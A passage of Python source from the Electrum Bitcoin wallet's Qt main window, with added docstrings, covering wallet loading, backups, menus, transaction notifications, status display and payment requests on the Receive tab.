    def diagnostic_name(self):
        # Label used by PrintError log lines: "<class>/<wallet basename>".
        return "%s/%s" % (PrintError.diagnostic_name(self),
                          self.wallet.basename() if self.wallet else "None")
    def is_hidden(self):
        # Treat a minimized window the same as a hidden one.
        return self.isMinimized() or self.isHidden()
def show_or_hide(self):
    """Toggle window visibility: raise it when hidden, hide it otherwise."""
    if not self.is_hidden():
        self.hide()
    else:
        self.bring_to_top()
def bring_to_top(self):
    """Make the window visible and raise it above its sibling windows."""
    self.show()
    self.raise_()
def on_error(self, exc_info):
    """Error handler for background tasks: report anything unexpected.

    UserCancelled is deliberately silent -- the user aborted the action.
    """
    if isinstance(exc_info[1], UserCancelled):
        return
    traceback.print_exception(*exc_info)
    self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
    """Network-layer callback (registered in __init__).

    Cheap bookkeeping is done directly; events that must touch Qt widgets
    are forwarded to the GUI thread via the 'network' signal.
    """
    if event == 'updated':
        self.need_update.set()
    elif event == 'new_transaction':
        self.tx_notifications.append(args[0])
    elif event in ('status', 'banner', 'verified'):
        # Marshal to the GUI thread; handled by on_network_qt.
        self.emit(QtCore.SIGNAL('network'), event, *args)
    else:
        self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
    """Handle a network event after it has been marshalled to the GUI thread."""
    handlers = {
        'status': lambda: self.update_status(),
        'banner': lambda: self.console.showMessage(args[0]),
        'verified': lambda: self.history_list.update_item(*args),
    }
    handler = handlers.get(event)
    if handler is None:
        self.print_error("unexpected network_qt signal:", event, args)
    else:
        handler()
def fetch_alias(self):
    """Resolve the configured OpenAlias in a background daemon thread.

    self.alias_info is reset to None first; when resolution finishes it is
    filled in and the 'alias_received' signal is emitted.
    """
    self.alias_info = None
    alias = self.config.get('alias')
    if not alias:
        return
    alias = str(alias)
    def resolve():
        self.alias_info = self.contacts.resolve_openalias(alias)
        self.emit(SIGNAL('alias_received'))
    worker = threading.Thread(target=resolve)
    worker.setDaemon(True)
    worker.start()
def update_account_selector(self):
    """Show the account drop-down only when the wallet has several accounts."""
    accounts = self.wallet.get_account_names()
    self.account_selector.clear()
    if len(accounts) <= 1:
        self.account_selector.hide()
        return
    self.account_selector.addItems([_("All accounts")] + accounts.values())
    self.account_selector.setCurrentIndex(0)
    self.account_selector.show()
def close_wallet(self):
    """Persist per-wallet GUI state and run plugin close hooks."""
    if not self.wallet:
        return
    self.print_error('close_wallet', self.wallet.storage.path)
    self.wallet.storage.put('accounts_expanded', self.accounts_expanded)
    run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
    """Attach *wallet* to this window and (re)initialize all wallet-dependent
    UI state.

    Order matters here: per-wallet state is restored before list widgets are
    refreshed, and menus/tabs are updated before the window is shown.
    """
    # Each wallet gets its own task thread for long-running operations.
    wallet.thread = TaskThread(self, self.on_error)
    self.wallet = wallet
    self.update_recently_visited(wallet.storage.path)
    self.import_old_contacts()
    # address used to create a dummy transaction and estimate transaction fee
    self.accounts_expanded = self.wallet.storage.get('accounts_expanded',{})
    self.current_account = self.wallet.storage.get("current_account", None)
    self.history_list.update()
    self.need_update.set()
    # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
    self.notify_transactions()
    # update menus
    self.update_new_account_menu()
    self.seed_menu.setEnabled(self.wallet.has_seed())
    self.mpk_menu.setEnabled(self.wallet.is_deterministic())
    self.update_lock_icon()
    self.update_buttons_on_seed()
    self.update_console()
    self.clear_receive_tab()
    self.receive_list.update()
    self.tabs.show()
    try:
        # "winpos-qt" holds (x, y, w, h); may be missing or malformed.
        self.setGeometry(*self.wallet.storage.get("winpos-qt"))
    except:
        # NOTE(review): bare except -- any failure falls back to defaults.
        self.setGeometry(100, 100, 840, 400)
    if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
        self.hide()
    else:
        self.show()
    self.watching_only_changed()
    run_hook('load_wallet', wallet, self)
def watching_only_changed(self):
    """Refresh the window title and menu availability after the wallet's
    watching-only status may have changed."""
    wallet = self.wallet
    title = 'Electrum %s - %s' % (wallet.electrum_version, wallet.basename())
    if wallet.is_watching_only():
        self.warn_if_watching_only()
        title += ' [%s]' % (_('watching only'))
    self.setWindowTitle(title)
    self.password_menu.setEnabled(wallet.can_change_password())
    self.import_menu.setVisible(wallet.can_import())
    self.export_menu.setEnabled(wallet.can_export())
def warn_if_watching_only(self):
    """Pop up a reminder that a watching-only wallet cannot spend."""
    if not self.wallet.is_watching_only():
        return
    msg = ' '.join([
        _("This wallet is watching-only."),
        _("This means you will not be able to spend Bitcoins with it."),
        _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
    ])
    self.show_warning(msg, title=_('Information'))
def import_old_contacts(self):
    """One-off migration: copy labelled addresses from the legacy 'contacts'
    storage key into the contacts store, then wipe the legacy key."""
    old_contacts = self.wallet.storage.get('contacts', [])
    if not old_contacts:
        return
    for addr in set(old_contacts):
        label = self.wallet.labels.get(addr)
        if label and bitcoin.is_address(addr):
            self.contacts[label] = ('address', addr)
    self.wallet.storage.put('contacts', None)
def open_wallet(self):
    """Prompt for a wallet file and open it in a new window."""
    folder = self.get_wallet_folder()
    filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", folder))
    if filename:
        self.gui_object.new_window(filename)
def backup_wallet(self):
    """Ask for a destination and save a copy of the current wallet file.

    Shows a confirmation message on success and a critical dialog when the
    copy fails (e.g. permission or disk errors).  Saving over the live
    wallet file itself is silently a no-op.
    """
    path = self.wallet.storage.path
    wallet_folder = os.path.dirname(path)
    filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
    if not filename:
        return
    new_path = os.path.join(wallet_folder, filename)
    if new_path == path:
        return
    try:
        shutil.copy2(path, new_path)
    # BUGFIX/consistency: use the `except ... as name` form already used
    # elsewhere in this file (works on Python 2.6+ and Python 3), instead
    # of the Python-2-only `except ..., name` comma syntax.
    except (IOError, os.error) as reason:
        self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
    else:
        self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
def update_recently_visited(self, filename):
    """Move *filename* to the front of the recently-open list (capped at 5),
    persist the list, and rebuild the File menu entries."""
    recent = self.config.get('recently_open', [])
    if filename in recent:
        recent.remove(filename)
    recent.insert(0, filename)
    recent = recent[:5]
    self.config.set_key('recently_open', recent)
    self.recently_visited_menu.clear()
    def make_opener(path):
        # Bind path now; a plain lambda in the loop would late-bind.
        return lambda: self.gui_object.new_window(path)
    for idx, path in enumerate(sorted(recent)):
        action = self.recently_visited_menu.addAction(os.path.basename(path), make_opener(path))
        action.setShortcut(QKeySequence("Ctrl+%d"%(idx+1)))
    self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
    """Return the directory containing the currently configured wallet file."""
    wallet_path = self.config.get_wallet_path()
    return os.path.dirname(os.path.abspath(wallet_path))
def new_wallet(self):
    """Create a new wallet file: suggest the first unused 'wallet_N' name,
    let the user edit it, and refuse to overwrite an existing file."""
    wallet_folder = self.get_wallet_folder()
    existing = os.listdir(wallet_folder)
    i = 1
    while ("wallet_%d" % i) in existing:
        i += 1
    filename = "wallet_%d" % i
    filename = line_dialog(self, _('New Wallet'), _('Enter file name')
                           + ':', _('OK'), filename)
    if not filename:
        return
    full_path = os.path.join(wallet_folder, filename)
    if os.path.exists(full_path):
        self.show_critical(_("File exists"))
        return
    self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
    """Build the application menu bar (File / Wallet / Tools / Help).

    Several actions are kept as attributes (seed_menu, mpk_menu, import_menu,
    export_menu, password_menu, ...) so other methods can enable/disable them
    according to wallet capabilities.
    """
    menubar = QMenuBar()
    # --- File menu ---
    file_menu = menubar.addMenu(_("&File"))
    self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
    file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
    file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
    file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
    file_menu.addSeparator()
    file_menu.addAction(_("&Quit"), self.close)
    # --- Wallet menu ---
    wallet_menu = menubar.addMenu(_("&Wallet"))
    wallet_menu.addAction(_("&New contact"), self.new_contact_dialog)
    self.new_account_menu = wallet_menu.addAction(_("&New account"), self.new_account_dialog)
    wallet_menu.addSeparator()
    self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
    self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
    self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
    wallet_menu.addSeparator()
    labels_menu = wallet_menu.addMenu(_("&Labels"))
    labels_menu.addAction(_("&Import"), self.do_import_labels)
    labels_menu.addAction(_("&Export"), self.do_export_labels)
    self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
    self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
    self.import_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
    self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
    wallet_menu.addAction(_("&Export History"), self.export_history_dialog)
    wallet_menu.addAction(_("Search"), self.toggle_search).setShortcut(QKeySequence("Ctrl+S"))
    # --- Tools menu ---
    tools_menu = menubar.addMenu(_("&Tools"))
    # Settings / Preferences are all reserved keywords in OSX using this as work around
    tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
    tools_menu.addAction(_("&Network"), self.run_network_dialog)
    tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
    tools_menu.addSeparator()
    tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
    tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
    tools_menu.addSeparator()
    paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
    raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
    raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
    raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
    raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
    raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
    self.raw_transaction_menu = raw_transaction_menu
    # --- Help menu ---
    help_menu = menubar.addMenu(_("&Help"))
    help_menu.addAction(_("&About"), self.show_about)
    help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
    help_menu.addSeparator()
    help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
    help_menu.addAction(_("&Report Bug"), self.show_report_bug)
    help_menu.addSeparator()
    help_menu.addAction(_("&Donate to server"), self.donate_to_server)
    self.setMenuBar(menubar)
def donate_to_server(self):
    """Open the Send tab pre-filled with the current server's donation address."""
    if not self.network.is_connected():
        return
    addr = self.network.get_donation_address()
    host = self.network.get_parameters()[0]
    self.pay_to_URI('bitcoin:%s?message=donation for %s'%(addr, host))
def show_about(self):
    """Display the About dialog with version and project blurb."""
    msg = (_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
           _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system."))
    QMessageBox.about(self, "Electrum", msg)
def show_report_bug(self):
    """Show instructions for filing bug reports on github."""
    msg = ' '.join([
        _("Please report any bugs as issues on github:<br/>"),
        "<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
        _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
        _("Try to explain not only what the bug is, but how it occurs.")
    ])
    self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
    """Show tray notifications for transactions received since the last call.

    Three or more pending transactions are summarised into a single
    notification; fewer are announced individually.  The pending list is
    emptied either way.
    """
    if not self.network or not self.network.is_connected():
        return
    self.print_error("Notifying GUI")
    if len(self.tx_notifications) > 0:
        # Combine the transactions if there are more then three
        tx_amount = len(self.tx_notifications)
        if(tx_amount >= 3):
            total_amount = 0
            for tx in self.tx_notifications:
                is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
                if(v > 0):
                    total_amount += v
            self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
                        % { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
            self.tx_notifications = []
        else:
            # BUGFIX: the original code removed items from the list while
            # iterating over it, which skips every other element.  Take a
            # snapshot, reset the pending list, then notify for each tx.
            txs, self.tx_notifications = self.tx_notifications, []
            for tx in txs:
                if not tx:
                    continue
                is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
                if(v > 0):
                    self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
    """Show *message* as a system-tray balloon (20s), if a tray is available."""
    if not self.tray:
        return
    self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
    """Wrapper around QFileDialog.getOpenFileName that remembers the
    directory last used by the user (config key 'io_dir')."""
    start_dir = self.config.get('io_dir', unicode(os.path.expanduser('~')))
    path = unicode(QFileDialog.getOpenFileName(self, title, start_dir, filter))
    if path:
        chosen_dir = os.path.dirname(path)
        if chosen_dir != start_dir:
            self.config.set_key('io_dir', chosen_dir, True)
    return path
def getSaveFileName(self, title, filename, filter = ""):
    """Wrapper around QFileDialog.getSaveFileName that suggests *filename*
    in the last-used directory and remembers any new choice ('io_dir')."""
    start_dir = self.config.get('io_dir', unicode(os.path.expanduser('~')))
    suggestion = os.path.join(start_dir, filename)
    path = unicode(QFileDialog.getSaveFileName(self, title, suggestion, filter))
    if path:
        chosen_dir = os.path.dirname(path)
        if chosen_dir != start_dir:
            self.config.set_key('io_dir', chosen_dir, True)
    return path
def connect_slots(self, sender):
    """Drive timer_actions from *sender*'s 'timersignal'."""
    self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
    """Periodic housekeeping driven by the global timer.

    Note this runs in the GUI thread.
    """
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    # resolve aliases typed into the pay-to field
    self.payto_e.resolve()
    # recompute the fee lazily; the flag is set by update_fee()
    if self.require_fee_update:
        self.do_update_fee()
        self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Render a satoshi amount using the user's zero-padding and unit settings."""
    return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
    """Return e.g. '1.5 mBTC', optionally followed by a fiat value supplied
    by an exchange-rate plugin in parentheses."""
    text = self.format_amount(amount) + ' ' + self.base_unit()
    fiat = run_hook('format_amount_and_units', amount)
    if text and fiat:
        text += ' (%s)'%fiat
    return text
def get_decimal_point(self):
    """Return the configured decimal point (2, 5 or 8 per base_unit)."""
    return self.decimal_point
def base_unit(self):
    """Return the display unit label matching the configured decimal point."""
    assert self.decimal_point in [2, 5, 8]
    return {2: 'bits', 5: 'mBTC', 8: 'BTC'}[self.decimal_point]
def update_status(self):
    """Refresh the status-bar text, status icon and tray tooltip from the
    current wallet and network state."""
    if not self.wallet:
        return
    if self.network is None or not self.network.is_running():
        text = _("Offline")
        icon = QIcon(":icons/status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            text = _("Synchronizing...")
            icon = QIcon(":icons/status_waiting.png")
        elif server_lag > 1:
            text = _("Server is lagging (%d blocks)"%server_lag)
            icon = QIcon(":icons/status_lagging.png")
        else:
            # confirmed / unconfirmed / unmatured balances
            c, u, x = self.wallet.get_account_balance(self.current_account)
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, True).strip())
            # append fiat balance and price from exchange rate plugin
            rate = run_hook('get_fiat_status_text', c + u + x)
            if rate:
                text += rate
            icon = QIcon(":icons/status_connected.png")
    else:
        text = _("Not connected")
        icon = QIcon(":icons/status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar, and the data tabs when it is safe to do so."""
    self.update_status()
    up_to_date = self.wallet.up_to_date
    if up_to_date or not self.network or not self.network.is_connected():
        self.update_tabs()
    if up_to_date:
        self.check_next_account()
def update_tabs(self):
    """Redraw every wallet-data list widget and refresh pay-to completions."""
    for view in (self.history_list, self.receive_list, self.address_list,
                 self.contacts_list, self.invoices_list):
        view.update()
    self.update_completions()
def create_history_tab(self):
    """Build and return the History tab widget."""
    from history_widget import HistoryWidget
    self.history_list = HistoryWidget(self)
    return self.history_list
def show_address(self, addr):
    """Open the modal detail dialog for a single address."""
    import address_dialog
    dialog = address_dialog.AddressDialog(self, addr)
    dialog.exec_()
def show_transaction(self, tx, tx_desc = None):
    '''tx_desc is set only for txs created in the Send tab'''
    # Delegates to the module-level show_transaction dialog helper.
    show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
    """Build and return the Receive tab: request editor grid, QR preview,
    and the saved-requests list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    self.receive_address_e = ButtonsLineEdit()
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
    self.receive_address_label = HelpLabel(_('Receiving address'), msg)
    self.receive_address_e.textChanged.connect(self.update_receive_qr)
    self.receive_address_e.setFocusPolicy(Qt.NoFocus)
    grid.addWidget(self.receive_address_label, 0, 0)
    grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 1, 0)
    grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 2, 0)
    grid.addWidget(self.receive_amount_e, 2, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    # Expiration selector; replaced by a read-only label when viewing an
    # already-saved request (see receive_item_changed).
    self.expires_combo = QComboBox()
    self.expires_combo.addItems(map(lambda x:x[0], expiration_values))
    self.expires_combo.setCurrentIndex(1)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
        _('The bitcoin address never expires and will always be part of this electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
    grid.addWidget(self.expires_combo, 3, 1)
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 3, 1)
    self.save_request_button = QPushButton(_('Save'))
    self.save_request_button.clicked.connect(self.save_payment_request)
    self.new_request_button = QPushButton(_('New'))
    self.new_request_button.clicked.connect(self.new_payment_request)
    # Clickable QR preview; toggles the detached QR window.
    self.receive_qr = QRCodeWidget(fixedSize=200)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.save_request_button)
    buttons.addWidget(self.new_request_button)
    grid.addLayout(buttons, 4, 1, 1, 2)
    self.receive_requests_label = QLabel(_('Requests'))
    self.receive_list = MyTreeWidget(self, self.receive_list_menu, [_('Date'), _('Account'), _('Address'), '', _('Description'), _('Amount'), _('Status')], 4)
    self.receive_list.currentItemChanged.connect(self.receive_item_changed)
    self.receive_list.itemClicked.connect(self.receive_item_changed)
    self.receive_list.setSortingEnabled(True)
    self.receive_list.setColumnWidth(0, 180)
    self.receive_list.hideColumn(1)
    self.receive_list.hideColumn(2)
    self.receive_list.on_update = self.update_receive_tab
    # layout
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addWidget(self.receive_qr)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.receive_list)
    vbox.setStretchFactor(self.receive_list, 1000)
    return w
def receive_item_changed(self, item):
    """Populate the request editor pane from the selected request row."""
    if item is None or not self.receive_list.isItemSelected(item):
        return
    addr = str(item.text(2))
    req = self.wallet.receive_requests[addr]
    expires = util.age(req['time'] + req['exp']) if req.get('exp') else _('Never')
    amount = req['amount']
    message = self.wallet.labels.get(addr, '')
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText(message)
    self.receive_amount_e.setAmount(amount)
    # A saved request shows its fixed expiry instead of the combo box.
    self.expires_combo.hide()
    self.expires_label.show()
    self.expires_label.setText(expires)
    self.new_request_button.setEnabled(True)
def delete_payment_request(self, item):
    """Remove the request behind the given list row and refresh the tab."""
    addr = str(item.text(2))
    self.wallet.remove_payment_request(addr, self.config)
    self.receive_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build a bitcoin: URI for the stored request at *addr*, appending the
    optional time/exp parameters and a base58-encoded signature."""
    req = self.wallet.receive_requests[addr]
    message = self.wallet.labels.get(addr, '')
    amount = req['amount']
    URI = util.create_URI(addr, amount, message)
    if req.get('time'):
        URI += "&time=%d"%req.get('time')
    if req.get('exp'):
        URI += "&exp=%d"%req.get('exp')
    if req.get('name') and req.get('sig'):
        raw_sig = req.get('sig').decode('hex')
        encoded_sig = bitcoin.base_encode(raw_sig, base=58)
        URI += "&name=" + req['name'] + "&sig=" + encoded_sig
    return str(URI)
def receive_list_menu(self, position):
    """Context menu for a row of the saved-requests list."""
    item = self.receive_list.itemAt(position)
    addr = str(item.text(2))
    # CLEANUP: the original looked up self.wallet.receive_requests[addr]
    # into an unused local; the lookup served no purpose and was removed.
    menu = QMenu(self)
    menu.addAction(_("Copy Address"), lambda: self.view_and_paste(_('Address'), '', addr))
    menu.addAction(_("Copy URI"), lambda: self.view_and_paste('URI', '', self.get_request_URI(addr)))
    menu.addAction(_("Save as BIP70 file"), lambda: self.export_payment_request(addr))
    menu.addAction(_("Delete"), lambda: self.delete_payment_request(item))
    run_hook('receive_list_menu', menu, addr)
    menu.exec_(self.receive_list.viewport().mapToGlobal(position))
def sign_payment_request(self, addr):
    """If the configured OpenAlias resolves to one of our own addresses,
    prompt for the password and sign the request stored at *addr*."""
    alias = self.config.get('alias')
    if not alias or not self.alias_info:
        return
    alias_addr, alias_name, validated = self.alias_info
    if not alias_addr or not self.wallet.is_mine(alias_addr):
        return
    msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
    password = self.password_dialog(msg)
    if not password:
        return
    try:
        self.wallet.sign_payment_request(addr, alias, alias_addr, password)
    except Exception as e:
        self.show_error(str(e))
def save_payment_request(self):
    """Validate and persist the request currently shown in the Receive tab."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = unicode(self.receive_message_e.text())
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    # Direct index into expiration_values instead of building a mapped list.
    i = self.expires_combo.currentIndex()
    expiration = expiration_values[i][1]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    self.wallet.add_payment_request(req, self.config)
    self.sign_payment_request(addr)
    self.receive_list.update()
    self.address_list.update()
    self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
    """Modal dialog showing *data* as QR-able text with a copy button."""
    dialog = WindowModalDialog(self, title)
    vbox = QVBoxLayout()
    label = QLabel(msg)
    label.setWordWrap(True)
    vbox.addWidget(label)
    text_edit = ShowQRTextEdit(text=data)
    vbox.addWidget(text_edit)
    vbox.addLayout(Buttons(CopyCloseButton(text_edit.text, self.app, dialog)))
    dialog.setLayout(vbox)
    dialog.exec_()
def export_payment_request(self, addr):
    """Serialize the request at *addr* to a BIP70 file chosen by the user."""
    r = self.wallet.receive_requests.get(addr)
    pr = paymentrequest.serialize_request(r).SerializeToString()
    name = r['id'] + '.bip70'
    fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
    if not fileName:
        return
    with open(fileName, "wb+") as f:
        f.write(str(pr))
    self.show_message(_("Request saved successfully"))
    self.saved = True
def new_payment_request(self):
    """Prepare the Receive form with a fresh unused address, creating one
    (after a gap-limit warning) when none is available."""
    addr = self.wallet.get_unused_address(self.current_account)
    if addr is None:
        if isinstance(self.wallet, Imported_Wallet):
            # Imported wallets cannot derive new addresses at all.
            self.show_message(_('No more addresses in your wallet.'))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        addr = self.wallet.create_new_address(self.current_account, False)
    self.set_receive_address(addr)
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Point the Receive form at *addr* and blank the description/amount."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the Receive form to a fresh unused address and empty fields."""
    addr = self.wallet.get_unused_address(self.current_account)
    self.receive_address_e.setText(addr or '')
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Show or hide the detached QR window, remembering its geometry across
    hide/show cycles."""
    import qrwindow
    if not self.qr_window:
        # First use: create and show it, then record its geometry.
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    elif self.qr_window.isVisible():
        # Currently shown: remember position, then hide.
        self.qr_window_geometry = self.qr_window.geometry()
        self.qr_window.setVisible(False)
    else:
        # Hidden: show again at the remembered position.
        self.qr_window.setVisible(True)
        self.qr_window.setGeometry(self.qr_window_geometry)
    self.update_receive_qr()
def receive_at(self, addr):
    """Jump to the Receive tab with *addr* pre-filled (invalid input is ignored)."""
    if not bitcoin.is_address(addr):
        return
    self.tabs.setCurrentIndex(2)
    self.receive_address_e.setText(addr)
    self.new_request_button.setEnabled(True)
def update_receive_tab(self):
    """Rebuild the saved-requests list and keep the Receive form consistent
    with the wallet's current unused address."""
    # hide receive tab if no receive requests available
    b = len(self.wallet.receive_requests) > 0
    self.receive_list.setVisible(b)
    self.receive_requests_label.setVisible(b)
    if not b:
        self.expires_label.hide()
        self.expires_combo.show()
    # show the account column only for multi-account wallets
    self.receive_list.setColumnHidden(1, len(self.wallet.get_accounts()) == 1)
    # update the receive address if necessary
    current_address = self.receive_address_e.text()
    domain = self.wallet.get_account_addresses(self.current_account, include_change=False)
    addr = self.wallet.get_unused_address(self.current_account)
    if not current_address in domain and addr:
        self.set_receive_address(addr)
    self.new_request_button.setEnabled(addr != current_address)
    # clear the list and fill it again
    self.receive_list.clear()
    for req in self.wallet.get_sorted_requests(self.config):
        address = req['address']
        if address not in domain:
            continue
        timestamp = req.get('time', 0)
        amount = req.get('amount')
        expiration = req.get('exp', None)
        message = req.get('memo', '')
        date = format_time(timestamp)
        status = req.get('status')
        signature = req.get('sig')
        requestor = req.get('name', '')
        amount_str = self.format_amount(amount) if amount else ""
        account = ''
        item = QTreeWidgetItem([date, account, address, '', message, amount_str, pr_tooltips.get(status,'')])
        if signature is not None:
            item.setIcon(3, QIcon(":icons/seal.png"))
            item.setToolTip(3, 'signed by '+ requestor)
        # BUGFIX: compare status by value, not identity -- `is not` on int
        # constants only works by accident of CPython small-int caching.
        if status != PR_UNKNOWN:
            item.setIcon(6, QIcon(pr_icons.get(status)))
        self.receive_list.addTopLevelItem(item)
def update_receive_qr(self):
    """Regenerate the QR code (and the detached QR window, when visible)
    from the current Receive form fields."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = unicode(self.receive_message_e.text()).encode('utf8')
    self.save_request_button.setEnabled((amount is not None) or (message != ""))
    uri = util.create_URI(addr, amount, message)
    self.receive_qr.setData(uri)
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.set_content(addr, amount, message, uri)
def show_before_broadcast(self):
    """Return whether transactions should be previewed before broadcast."""
    return self.config.get('show_before_broadcast', False)
def set_show_before_broadcast(self, show):
    """Persist the 'preview before broadcast' preference and retitle Send."""
    self.config.set_key('show_before_broadcast', bool(show))
    self.set_send_button_text()
def set_send_button_text(self):
